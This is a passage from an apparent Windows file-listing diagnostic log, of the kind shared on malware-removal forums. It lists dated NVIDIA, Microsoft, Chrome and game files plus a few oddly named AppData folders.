(Malwarebytes Corp.) C:\Users\***\Desktop\mbar-1.09.3.1001.exe 2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP 2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\***\AppData\LocalLow\Mozilla 2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\***\AppData\Local\Mozilla 2017-08-01 01:54 - 2017-08-08 17:26 - 000002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-08-01 01:54 - 2017-08-08 17:26 - 000002214 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\***\AppData\Local\PDF24 2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys 2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb 2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json 2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json 2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll 2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll 2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys 2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Usidikujp 2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Rvurcez 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Yhwopc 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Wqy He 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bizpiwcinu 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bgew 2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll 2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll 2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll 2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys 2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\***\AppData\LocalLow\Thunder Lotus Games 2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk 2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll 2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys 2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll 2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll 2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys 2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe 2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll 2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll 2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll 2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll 2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll 2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr 2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll 2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll 2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr 2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll 2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll 2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll 2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll 2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe 2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll 2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys 2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll 2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll 2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll 2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe 2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys 2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe 2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe 2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll 2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll 2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll 2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll 2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl 2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe 2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft 